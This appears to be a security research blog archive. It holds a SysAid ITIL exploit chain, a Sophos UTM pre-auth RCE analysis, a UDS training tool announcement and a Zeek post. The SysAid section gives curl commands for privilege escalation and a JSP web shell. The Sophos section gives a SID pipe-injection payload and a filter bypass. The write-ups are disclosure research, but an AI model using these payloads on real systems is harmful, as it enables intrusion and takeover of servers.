4   id:000053,src:000000,op:havoc,rep:8,+cov.mid	0x0000000107b9022c 0x1062db000 + 25907756
5   com.apple.Foundation          	0x00007fff212e449f __NSBLOCKOPERATION_IS_CALLING_OUT_TO_A_BLOCK__ + 7
6   com.apple.Foundation          	0x00007fff212e4397 -[NSBlockOperation main] + 98
7   com.apple.Foundation          	0x00007fff212e432a __NSOPERATION_IS_INVOKING_MAIN__ + 17


In the end, I gave Apple 38 crashes. They determined 2 were security-relevant. These issues affected Logic Pro X and GarageBand on OSX and iOS and were fixed in version 10.4.6 of GarageBand and 10.7.3 in Logic Pro X. All of the files I provided Apple are available in the following Github repository.


When approaching opaque targets, it may be better to fuzz a faster and easier alternative and use the generated corpus against the more difficult target. It’s not a perfect technique, but can still be fruitful.


  • Dec 2 2021 - Reported issues to Apple

  • Dec 3 2021 - Response from support confirming receipt

  • Jan 4 2022 - Atredis requests update

  • Jan 10 2022 - Atredis requests update

  • Jan 17 2022 - Apple responds with update

  • Feb 7 2022 - Atredis requests update

  • Feb 14 2022 - Atredis requests update

  • Feb 17 2022 - Apple responds with update. Parties agree to hold details until patch.

  • Mar 8 2022 - Apple requests credit details

  • Mar 8 2022 - Atredis confirms credit details

  • Mar 14 2022 - Details released and patches available.

Unauthenticated Remote Code Execution Chain in SysAid ITIL -- CVE-2021-43971, CVE-2021-43972, CVE-2021-43973, CVE-2021-43974

6 January 2022 at 15:00

Atredis Partners found a chain of vulnerabilities in the ITIL product offering by SysAid during personal research. Other competitors to this SysAid product are ManageEngine, Remedy, or other ticketing and workflow systems. The full chain of issues allows an unauthenticated attacker to gain full administrative rights over the ITIL installation and to execute arbitrary code for a local shell.

Atredis only tested the on-premises version of SysAid ITIL. If you are running an on-premises SysAid ITIL system, updating to the latest version will resolve the issues described below. At the time of this writing, the latest version for on-premises customers is 21.2.35.

You can find details from SysAid here: https://www.sysaid.com/product/on-premises/latest-release

Unauthenticated User Registration

First, the /enduserreg endpoint does not respect the server-side setting for allowing anonymous users to register. This requires the instance be set up with outgoing email, but once registered, the email used to register will be sent a new password for the user.

id=`curl | grep -Eho 'accountid=(.*?)"' | cut -d '"' -f1 | cut -d '=' -f2`

curl -X POST --data "accountID="$id"&X_TOKEN_"$id"=%24tokenValue&thanksForm=thankyou.htm&X_TOKEN_"$id"_trial=%24tokenValue&[email protected]&firstName=Unauthed&lastName=User&sms=&phone=&mobile=&Save="

Check your email, then let’s escalate our new user to admin.

SQL Injection

Once authenticated, the authenticated user can escalate their privileges with a stacked UPDATE query. The issue is in the getMobileList method in SysAidUser.java

String str1 = " ";
String str2 = "order by lower(calculated_user_name)";
if (paramString2 != null && paramString2.length() > 0) {
    paramString2 = paramString2.toLowerCase();
    str1 = " and lower(calculated_user_name) like '%" + paramString2 + "%' ";

Above you can see paramString2 is used unsafely in the SQL query. This can used to build a stacked query which updates our user’s row in the database.

curl -H "Cookie: JSESSIONID=$sess"';UPDATE sysaid_user SET administrator=CHAR(89),main_user=CHAR(89) WHERE user_name='[email protected]'--

In the above unencoded HTTP parameter, a stacked query was used to update a column in the user table which will be read during authentication, giving us admin on the SysAid instance.

Arbitrary File Upload

After escalating the privilege, it is possible to relogin as an admin user and upload a JSP shell. However, the shell is not within reach just yet. Next, you can upload an arbitrary file to the server with the UploadPsIcon.jsp endpoint, but this does not immediately make the uploaded file available on the web server. It will return an absolute path on the server though, which we can use at the next step. Note the required Referer header.

path=`curl -H "Referer:" -H "Cookie: JSESSIONID=$sess" -F "[email protected]" -F "X_TOKEN_$id=$token" "" 2>&1 | grep tempFile.value | cut -d '"' -f2`

echo $path

The file cmd.jsp is a simple JSP shell.

<%@ page import="java.util.*,java.io.*"%>
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");

    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    disr = dis.readLine();

Arbitrary File Copy

Once uploaded, it is possible to copy a file from an arbitrary absolute path on the server to the directory meant to server images or icons. An absolute path exists from the previous step because it was returned in the response. Using the UserSelfServiceSettings.jsp endpoint, it is possible to pass on a path to copy a file from anywhere on the server itself into the web application to be available via an HTTP request. Note the required Referer header.

curl -X POST  -H "Referer:" -H "Cookie: JSESSIONID=$sess" --data "tabID=22&resetPasswordMethod=user&numberOfInvalidAttempts=5&blockUserMinutes=30&dummycaptcha=on&captcha=Y&enableGuest=N&userEmailAsIdentifier=N&PsImageUrl=&sendRandomCodeBySms=N&numberOfSecurityQuestions=2&answerMinimumLength=3&Apply=&OK=&Cancel=&Addtokb=&subAction=&reopenNote=&pageID=1&subPageID=1&replacePage=Y&changes=0&X_TOKEN_$id=$token&showAddFailMsgPopup=&paneMessage=&paneType=&paneBtnArrayButtons=&panePreSubmitFunc=&paneSubmitParentForm=&paneCancelFunc=hideOptionPane&tempFile=$path&fileName=cmd.jsp&psImageChange=true&id="

Finally, A Shell

Once we have the file copied, it’s now possible to request a shell. Be sure to not use cookies. The configuration of the web server by default treats requests by authenticated users differently, and referencing the shell can only happen with an unauthenticated HTTP request.



/mobile/SelectUsers.jsp SQLi: CVE-2021-43971
/UserSelfServiceSettings.jsp unrestricted file copy: CVE-2021-43972
/UploadPsIcon.jsp unrestricted file upload:  CVE-2021-43973
/enduserreg anonymous user registration: CVE-2021-43974


2021-09-21: SysAid notified. Original Proof-of-Concept (PoC) and emails blocked unbeknownst to both parties.

2021-10-05: Confirmed receipt of the original scripts to reproduce issues.

2021-11-17: CVE IDs allocated and communicated

2021-12-22: SysAid confirms issues resolved

2022-01-05: Details released

Exploring Unified Diagnostic Services with uds-zoo

29 October 2021 at 14:00

uds-zoo is a project created by Chris Bellows and Tom Steele at Atredis Partners.

Today we are releasing a new project that will be useful for learning and exploration of attacking and defending automotive targets, specifically Unified Diagnostic Services (UDS/ISO-14229).

There are many resources (books/blogs/papers) that can get you started down the path of learning to interrogate automotive systems. These typically focus on the controller area network (CAN) bus as the target. It is easy to follow along using an inexpensive USB adapter and (if you have the stomach for it) your vehicle, or alternatively a simulator. In contrast, UDS is usually only given a cursory overview. Most sources focus on conducting discovery of servers and services on the network, with examples interacting with a handful of services.

While it is possible for someone to follow along on their own vehicle, executing discovery and enumeration of UDS services (which is a great learning exercise), you are not guaranteed to run into a vulnerability or misconfiguration. For example, on a secured device most interesting services require the client to establish a non-default session and successfully authenticate as seen in the following table:

It is worth noting that the UDS specification (ISO-14229) is intended to be a guide and leaves the underlying implementations up to the developer, so the items marked with * may or may not be accessible depending on the service implementation or request parameters.

Besides using your own vehicle, the other option that is available would be to buy an engine control unit (ECU) to test outside of a car directly. This option is much cheaper than purchasing an entire car, except it still requires providing power as well as any signals the device may require to enter a running state. You may ultimately end up in the same situation where the device has been designed to require authentication to access most services.

These pain-points led to the idea of creating a framework designed to allow someone to explore example UDS servers with common vulnerabilities. After some internal brainstorming on how to implement the framework, we decided to abstract away all of the underlying layers (CAN/ISO-TP) and emulate only the UDS application layer. By only emulating the application layer, the tool is not tied to a specific platform and does not require the user to setup or configure system interfaces or drivers (CAN/ISO-TP).

The application is designed to be extensible and includes a handful of example “levels” that provide a capture-the-flag style experience. In addition to the example levels, a bare-bones example level is provided to get you started designing your own. By default the application provides its own interface to interact with and complete the included levels that is accessible using a web browser:

Snazzy Web -1.0 Interface

The framework and associated application server is written in Go, and we have provided Docker tooling for convenience.

For those who would rather have a more realistic experience, we also created a small Python program (isotp_gateway) that that will expose the challenges over a virtual can interface:

$ python gateway.py start               
starting thread for id: 0x01 level: Level1 rxid: 0x01 txid: 0x90
starting thread for id: 0x02 level: Level2 rxid: 0x02 txid: 0x90
starting thread for id: 0x03 level: Level3 rxid: 0x03 txid: 0x90
starting thread for id: 0x04 level: Level4 rxid: 0x04 txid: 0x90
starting thread for id: 0x05 level: Level5 rxid: 0x05 txid: 0x90

After starting the gateway, each level will be accessible over the virtual can interface and can be interacted with using whatever tool you’d like. For instance, using isotpsend to interact with Level1:

$ echo 22 13 37 | isotpsend -s 0x01 -d 0x90 vcan0

We look forward to community contributions and implementing additional exercises in the future.

Source of uds-zoo and additional documentation can be found at GitHub: https://github.com/atredispartners/uds-zoo

Sophos UTM Preauth RCE: A Deep Dive into CVE-2020-25223

18 August 2021 at 18:30

Note: Sophos fixed this issue in September 2020. Information about patch availability is in their security advisory.


On a recent client engagement I was placed in a Virtual Private Cloud (VPC) instance with the goal of gaining access to other VPCs. During enumeration of attack surface I came across a Sophos UTM 9 device:

When reviewing known vulnerabilities in these Sophos UTM devices, I came across CVE-2020-25223. The only information I could find about this vulnerability was that it was an unauthenticated remote command execution bug that affected several versions of the product:

A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11

After confirming with our client that they were running a vulnerable version, I posted to Twitter and a couple Slacks to see if anyone had any details on the vulnerability, and then set off on what I thought would be a quick adventure, but turned out not to be so quick in the end.

This blog post tells the story of that adventure and how in the end I was able to identify the preauth RCE.

Use the force Diffs, Luke Justin.

When looking for the details on a known patched bug, I started off the same way any sane person would, comparing the differences between an unpatched version and a patched version.

I grabbed ISOs for versions 9.510-5 and 9.511-2 of the Sophos UTM platform and spun them up in a lab environment. Truth be told I ended up spinning up six different versions, but the two I mentioned were what I ended up comparing in the end.

Enabling Remote Access

A nice feature on the Sophos UTM appliances is that once the instance is spun up, you can enable SSH, import your keys, and access the device as root using the Management -> System Settings -> Shell Access functionality in the web interface:

Then it's just a matter of SSH'ing into the instance:

$ ssh [email protected]
Last login: Mon Aug 16 14:37:00 2021 from

Sophos UTM
(C) Copyright 2000-2017 Sophos Limited and others. All rights reserved.
Sophos is a registered trademark of Sophos Limited and Sophos Group.
All other product and company names mentioned are trademarks or registered
trademarks of their respective owners.

For more copyright information look at /doc/astaro-license.txt
or http://www.astaro.com/doc/astaro-license.txt

NOTE: If not explicitly approved by Sophos support, any modifications
      done by root will void your support.

sophos:/root #

Where's the code?

I proxied all web traffic to the instances through Burp and found that the webadmin.plx endpoint handles a majority of the incoming web traffic. For instance, the following HTTP POST request is made when navigating to the instance, unauthenticated:

POST /webadmin.plx HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-type: application/json; charset=UTF-8
Content-Length: 204
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: max-age=0

{"objs": [{"FID": "init"}], "SID": 0, "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629216182300_0.6752239026892818", "current_uuid": "", "ipv6": true}

On the device we can see that webadmin.plx is indeed running:

sophos:/root # ps aux | grep -i webadmin.plx
wwwrun   12685  0.4  1.0  93240 89072 ?        S    11:22   0:08 /var/webadmin/webadmin.plx

It turns out the webserver is actually running chroot'd in /var/sec/chroot-httpd/, so that's where we can find the file:

# ls /var/sec/chroot-httpd/var/webadmin/webadmin.plx

Not being familiar with the .plx file format, I used file to see what I was dealing with:

# file webadmin.plx
webadmin.plx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), stripped

Huh, ok...I was hoping for something easy like some PHP or Python or something. After poking at the ELF for a while and digging around online I came across the following writeup (I don't know where the original is, I'm sorry):


It seems like I'm not the first person to assess one of these devices, and honestly, this writeup probably saved me several more hours of poking around. The gist of the writeup is that the author found that the .plx files are Perl files that have been compiled using ActiveState's Perl Dev Kit and that you can access the original source by running the .plx file in a debugger, setting a break point, and recovering the script from memory.

I went through this process and it worked surprisingly well. Note for the author of the writeup: you can use an SSH tunnel to hit the IDA debugger running on the Sophos UTM instance.

Ok... but where's the rest of the code...?

At this point I had access to the webadmin.plx code (which is actually asg.plx and is actually Perl code) which was great, but there was a big problem: the asg.plx file isn't a massive file with all of the code. I needed access to the Perl modules that asgx.plx imports, like:

# astaro stuff ---------------------------------------------
use Astaro::Logdispatcher;
use Astaro::Time::Zone qw/lgdiff/;

# necessary core modules -----------------------------------
use core::modules::core_globals;
use core::modules::core_tools;


I wish I could say I was able to get access to this code quickly and easily, and in the end it was as simple as extracting it with the right tools, but I didn't know that at the time and I stumbled and crawled a great distance along the way.

I was able to confirm that the modules that were imported by asg.plx would be accessible by taking memory dumps of the process and using strings to find bits and pieces of code, so on the bright side, the code was definitely there.

After a couple late nights of trying different things like extracting code from memory dumps, patching the binaries, etc... I posted the problem and the webadmin.plx file in work chat. There were great suggestions on using LD_PRELOAD on libperl.so or using binary instrumentation with frida or PIN to get access to the source code, but then one of our great reverse engineers found that the file actually had a BFS filesystem embedded at the end of the ELF file, and in a couple minutes was able to put together a script that could then be used with https://github.com/the6p4c/bfs_extract to extract the filesystem (and with that, the source).

The script can be found here:

import sys
import struct

class BFS:
  def __init__(self, data):
    self.data = data

  def open(cls, path):
    with open(path, 'r+b') as f:
      f.seek(-12, 2)
      magic_chunk = f.read(12)
      pointer_header = struct.unpack('<III', magic_chunk)
      assert(pointer_header[0] == 0xab2155bc)

      f.seek(-12 - pointer_header[2], 2)
      data = f.read(pointer_header[2])
      return cls(data)

bfs = BFS.open(sys.argv[1])
with open(sys.argv[2], 'wb') as outf:


Using it is fairly straight forward:


python3 ~/tools/bfs_extract/yank.py $1 stage1-$1
python3 ~/tools/bfs_extract/bfs.py stage1-$1 stage2-$1
python3 ~/tools/bfs_extract/bfs_extract.py stage2-$1 $2


$ bfs_extract.sh webadmin.plx extracted/
Found file DateTime/TimeZone/America/Indiana/Vevay.pm
    Offset: 1ab4c
Found file Astaro/Confd/Object/time/single.pm
    Offset: 1b6a4
Found file auto/Net/SSLeay/httpx_cat.al
    Offset: 1b8a4
Found file auto/NetAddr/IP/InetBase/inet_any2n.al

Watching the thousands of source files extracting from the .plx file was beautiful, I almost cried tears of joy.

Back to the Diffs

I spent a fair amount of time extracting the source code out of the .plx files from the UTM instances and also pulled the entire /var/sec/chroot-httpd/ directory to capture any differences in configuration files. My tool of choice for reviewing diffs is Meld as it lets me quickly and visually review diffs of directories and files:

Between the versions, the only change was in the wfe/asg/modules/asg_connector.pm file:

The change in this file can be seen in meld below:

The updated code shows a check being added to the switch_session subroutine make sure the SID (Session ID) does not contain any other characters other than alphanumeric characters; so it's likely that the vulnerability sources from the value of SID.

Going Down the Rabbit Hole

The only place the switch_session subroutine is called is from the do_connect subroutine:

$ ag switch_session
68:# just a wrapper for switch_session
71:  return $self->switch_session(@_);
76:sub switch_session {
81:  &main::msg('d', "Called " . __PACKAGE__ . "::switch_session()");

The do_connect subroutine just appears to be a wrapper for the switch_session subroutine:

# just a wrapper for switch_session
sub do_connect {
  my $self = shift;
  return $self->switch_session(@_);


The do_connect subroutine is used in various places in the code:

$ ag do_connect
290:    $SID = $sys->do_connect($config->{backend_address});

110:  $SID = $sys->do_connect($config->{backend_address},$vars->{SID}) if $vars->{SID};

55:      $SID = $sys ? $sys->do_connect($config->{backend_address}, $_cookies->{SID}->value) : undef;

69:sub do_connect {

30:# renamed connect to do_connect for avoid confusion with
32:sub do_connect {
33:  die __PACKAGE__ . '::do_connect() has to be implemented by inherting module!';

190:    $SID = $sys ? $sys->do_connect($config->{backend_address}, $req->{SID}) : undef;
216:    $SID = $sys ? $sys->do_connect($config->{backend_address}, $req->{SID}) : undef;
325:          if ( $cookies->{SID} and ( $cookies->{SID} eq $SID or $SID = $sys->do_connect($config->{backend_address}, $cookies->{SID}) ) ) {

Knowing that asg.plx is the script name of webadmin.plx, let's take a look there first:

# POST request - means JSON request
  if ( $ENV{'REQUEST_METHOD'} eq 'POST' ) {

    # no further processing in case of content-type violation
    goto REQ_OUTPUT if $req->{ct_violation};

    # switch our identity if necessary
    $SID = $sys ? $sys->do_connect($config->{backend_address}, $req->{SID}) : undef;


The do_connect subroutine is used at the start of the HTTP POST request handling and also takes SID so we should be able to hit it with any HTTP POST request.

Throughout the code there are references to confd which is a backend service that the httpd frontend communicates with over RPC. When making an HTTP POST request to webadmin.plx, the httpd service connects to confd and sends it some data, such as SID, that's what we are seeing with:

$SID = $sys ? $sys->do_connect($config->{backend_address}, $req->{SID}) : undef;

So when an HTTP POST request is made, the SID is sent to confd where it is checked to see if it's a valid session identifier. This can be seen in the log files in /var/log/ on the appliance. If we make the following request with an invalid SID:

POST /webadmin.plx HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-type: application/json; charset=UTF-8
Content-Length: 227
DNT: 1
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"objs": [{"FID": "get_user_information"}], "SID":"ATREDIS", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1628997061547_0.82356395860014", "current_uuid": "", "ipv6": true}

Then we can see the lookup happen in the /var/log/confd-debug.log log file. The confd calls get_SID with the user-supplied SID:

2021:08:17-15:20:50 sophos9-510-5-1 confd[3751]: D Astaro::RPC::server_loop:125() => listener: new connection...
2021:08:17-15:20:50 sophos9-510-5-1 confd[3751]: D Astaro::RPC::reap_children:118() => reaped: 32643
2021:08:17-15:20:50 sophos9-510-5-1 confd[3751]: D Astaro::RPC::server_loop:215() => forked: 32653
2021:08:17-15:20:50 sophos9-510-5-1 confd[3751]: D Astaro::RPC::server_loop:223() => workers: 11682, 32653, 10419
2021:08:17-15:20:50 sophos9-510-5-1 confd[32653]: D Astaro::RPC::server_loop:159() => child: serving connection from
2021:08:17-15:20:50 sophos9-510-5-1 confd[32653]: D Astaro::RPC::get_request:321() => get_request() start
2021:08:17-15:20:50 sophos9-510-5-1 confd[32653]: >=========================================================================
2021:08:17-15:20:50 sophos9-510-5-1 confd[32653]: D Astaro::RPC::response:287() => prpc response: $VAR1 = [
2021:08:17-15:20:50 sophos9-510-5-1 confd[32653]:           1,
2021:08:17-15:20:50 sophos9-510-5-1 confd[32653]:           'Welcome!'
2021:08:17-15:20:50 sophos9-510-5-1 confd[32653]:         ];
2021:08:17-15:20:50 sophos9-510-5-1 confd[32653]: <=========================================================================
2021:08:17-15:20:50 sophos9-510-5-1 confd[32653]: D Astaro::RPC::get_request:321() => get_request() start
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:                           'SID' => 'ATREDIS',
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:                           'asg_ip' => '',
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:                           'ip' => ''
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:                         }
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:                       ],
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:           'id' => 'unsupported',
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:           'method' => 'NewHandle',
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:           'path' => '/webadmin/nonproxy'
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:         };
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]: |=========================================================================
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]: D Astaro::RPC::server_loop:178() => method: new params: $VAR1 = [
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:           {
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:             'SID' => 'ATREDIS',
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:             'asg_ip' => '',
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:             'ip' => ''
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:           }
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:         ];
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]: <=========================================================================
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]: D utils::write_sigusr1:389() => id="3100" severity="debug" sys="System" sub="confd" name="write_sigusr1" user="system" srcip="" facility="system" client="unknown" call="new" mode="add" pids="32753"
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]: D Astaro::RPC::response:287() => prpc response: $VAR1 = bless( {}, 'Astaro::RPC' );
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]: D Astaro::RPC::get_request:321() => get_request() start
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]: >=========================================================================
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]: D Astaro::RPC::get_request:461() => got request: $VAR1 = {
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:           'params' => [
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:                         bless( {}, 'Astaro::RPC' ),
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:                         'get_SID'
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:                       ],
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:           'id' => 'unsupported',
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:           'method' => 'CallMethod',
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:           'path' => '/webadmin/nonproxy'
2021:08:17-15:23:14 sophos9-510-5-1 confd[32753]:         };


The confd service responds back to the httpd service that the SID does not exist and we can see that error occur in the /var/log/webadmin.log log file:

2021:08:17-15:23:14 sophos9-510-5-1 webadmin[32509]: |=========================================================================
2021:08:17-15:23:14 sophos9-510-5-1 webadmin[32509]: W No backend for SID = ATREDIS...
2021:08:17-15:23:14 sophos9-510-5-1 webadmin[32509]:
2021:08:17-15:23:14 sophos9-510-5-1 webadmin[32509]:  1. main::top-level:221() asg.plx


Let's see what exactly happens with the SID value that we supply in our HTTP POST request. When the connection to confd is made, confd attempts to read the stored SID from the confd sessions directory at $config::session_dir (/var/confd/var/sessions):

my $new = read_storage("$config::session_dir/$session->{SID}");


The read_storage subroutine takes a $file which in this case is SID and passes it to the Storable::lock_retrieve subroutine:

# read from Perl Storable file
sub read_storage {
  my $file = shift;
  my $href;

  require Storable;
  eval { local $SIG{'__DIE__'}; $href = Storable::lock_retrieve($file); };
  return if $@;
  return unless ref $href eq 'HASH';

  return $href;


The lock_retrieve subroutine calls the _retrieve subroutine:

sub lock_retrieve {
    _retrieve($_[0], 1);


The _retrieve subroutine then calls open() on the file:

sub _retrieve {
    my ($file, $use_locking) = @_;
    local *FILE;
    open(FILE, $file) || logcroak "can't open $file: $!";


In Perl, open() can be a dangerous function when user-supplied data is passed as the second argument. You can learn more about this in Perl's official documentation here, but this quick example demonstrates the danger:


my $a = "|id";
local *FILE;

open(FILE, $a);


$ perl test.pl
uid=1000(justin) gid=1000(justin) groups=1000(justin)

In the case of the UTM appliance, the user-supplied SID value is passed to the second argument of open(). That seems pretty straight forward to exploit, right? Let's give it a shot. We'll attempt to run the command touch /tmp/pwned:

POST /webadmin.plx HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-type: application/json; charset=UTF-8
Content-Length: 227
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"objs": [{"FID": "init"}], "SID": "|touch /tmp/pwned|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}

Now let's check for our file!

# ls -l /tmp/pwned
ls: cannot access /tmp/pwned: No such file or directory

Erm. No file has been written to the /tmp/ directory. When I got to this point, I was frustrated, let me tell you.

Let's look into the logs and see if we can figure out what happened.

2021:08:17-16:45:30 sophos9-510-5-1 confd[5375]: |=========================================================================
2021:08:17-16:45:30 sophos9-510-5-1 confd[5375]: D Astaro::RPC::server_loop:178() => method: new params: $VAR1 = [
2021:08:17-16:45:30 sophos9-510-5-1 confd[5375]:           {
2021:08:17-16:45:30 sophos9-510-5-1 confd[5375]:             'SID' => '0ouch /tmp/pwned',
2021:08:17-16:45:30 sophos9-510-5-1 confd[5375]:             'asg_ip' => '',
2021:08:17-16:45:30 sophos9-510-5-1 confd[5375]:             'ip' => ''
2021:08:17-16:45:30 sophos9-510-5-1 confd[5375]:           }
2021:08:17-16:45:30 sophos9-510-5-1 confd[5375]:         ];
2021:08:17-16:45:30 sophos9-510-5-1 confd[5375]: <=========================================================================


2021:08:17-16:45:30 sophos9-510-5-1 webadmin[5272]: |=========================================================================
2021:08:17-16:45:30 sophos9-510-5-1 webadmin[5272]: W No backend for SID = 0ouch /tmp...
2021:08:17-16:45:30 sophos9-510-5-1 webadmin[5272]:
2021:08:17-16:45:30 sophos9-510-5-1 webadmin[5272]:  1. main::top-level:221() asg.plx


Hmm... The SID in the logs is 0ouch /tmp/pwned, that's not what we sent...

Say Diff Again!

At this point I knew exactly what the issue was. Remember at the beginning of this writeup when I said that I like to diff both source code and configuration files? Meet the other diff between versions:

Reviewing the httpd-webadmin.conf configuration file in /var/chroot-httpd/etc/httpd/vhost shows us this almost-show-stopper:

<LocationMatch webadmin.plx>
        AddInputFilter sed plx
        InputSed "s/\"SID\"[ \t]*:[ \t]*\"[^\"]*\|[ \t]*/\"SID\":\"0/g"


Any HTTP requests coming into webadmin.plx are processed by InputSed which matches and replaces our "SID":"| JSON body with "SID":"0. This can be visually seen on regex101.com:

After spending some time attempting to bypass the regex and try different payloads, I had a thought... This input filter only triggers when the location matches webadmin.plx. And then I saw it and it was beautiful:

RewriteRule ^/var /webadmin.plx


Making an HTTP request to the /var endpoint is the same as making a request to the /webadmin.plx endpoint, but without the filter. Making the request again, but to the new endpoint:

POST /var HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-type: application/json; charset=UTF-8
Content-Length: 227
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"objs": [{"FID": "init"}], "SID": "|touch /tmp/pwned|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}

And here's our file:

# ls -l /tmp/pwned
-rw-r--r-- 1 root root 0 Aug 17 17:07 /tmp/pwned

We now have unauthenticated RCE on the Sophos UTM appliance as the root user.

And that ends our adventure for now. I hope you enjoyed this writeup :)

Le Zeek, C’est Chic: Using an NSM for Offense

20 May 2021 at 16:47

In one of my many former lives (and occasionally in this one) I played "defense", wading through network traffic, logs, etc. for Bad Things™. Outside of the standard FOSS (and even commercial) tools for doing that, I grew to have a real fondness for Zeek, which is often the cornerstone for other network security monitoring (NSM) products and platforms. These days, I use Zeek primarily for NSM purposes and profiling of IoT (and other embedded) devices we at Atredis are either testing or researching.

However, some people may not be aware of the potential for using Zeek in red team or network penetration testing capacities. In this post, I'll touch briefly on Zeek's capabilities and then get into a few examples of using Zeek to help guide/inform testing efforts.

What is Zeek?

From the Zeek docs (a.k.a. "Book of Zeek"):

Zeek is a passive, open-source network traffic analyzer. Many operators use Zeek as a network security monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting.

First created in 1994, it was originally known as "Bro" (as in "Big Brother", a nod to George Orwell's 1984). Zeek consists of a very powerful pipeline for processing packets, assembling them into streams, analyzing fields/contents, extracting metadata/files, outputting to various sources/formats, etc. Zeek is also a core component of platforms like Security Onion, Malcolm, Corelight, Bricata, etc.

Why a "defensive" tool?

You might be asking yourself -- er, rather me, but rhetorically -- this question. The reason is simple: using tcpdump, Wireshark, and their ilk in offensive operations is not altogether different. In fact, SANS SEC503 ("Intrusion Detection In-Depth") covers using these tools for their intended, non offense purposes. The other reason is that while full content captures are great, you don't always need them. Moreover, these tools can all complement each other (i.e., use Zeek for broader analysis and statistics, and keep your tcpdump and Wireshark for more thorough, full content analyses).

Installation and Setup

I'm not going to cover "how to install Zeek" in this post, as it's very well-documented in the Book of Zeek. However, there are a couple of things to enable for the purposes of the examples herein.

Zeek JSON Logs

The default format for Zeek logs is tab-delimited. However, I prefer Zeek's JSON-formatted logs for easier parsing with tools like jq. JSON log output is easy to enable by adding (or uncommenting) the following line in local.zeek:

@load policy/tuning/json-logs.zeek

MAC Address Logging

Although this isn't totally pertinent to the examples later on, I find MAC address logging hugely helpful for host/device identification. Turning on the following option in local.zeek will add layer 2 source/destination fields to entries in conn.log:

@load policy/protocols/conn/mac-logging
  "ts": 1619634510.803026,
  "uid": "CGgSqRTXbeiqDz71l",
  "id.orig_h": "",
  "id.orig_p": 26820,
  "id.resp_h": "",
  "id.resp_p": 53,
  "proto": "udp",
  "service": "dns",
  "orig_l2_addr": "88:dc:96:6e:13:5c",
  "resp_l2_addr": "0a:e8:4c:68:1d:60"

Zeek Logs

The Book of Zeek has a more thorough explanation of each log type, but a quick rundown is as follows:

Log/File Name Description
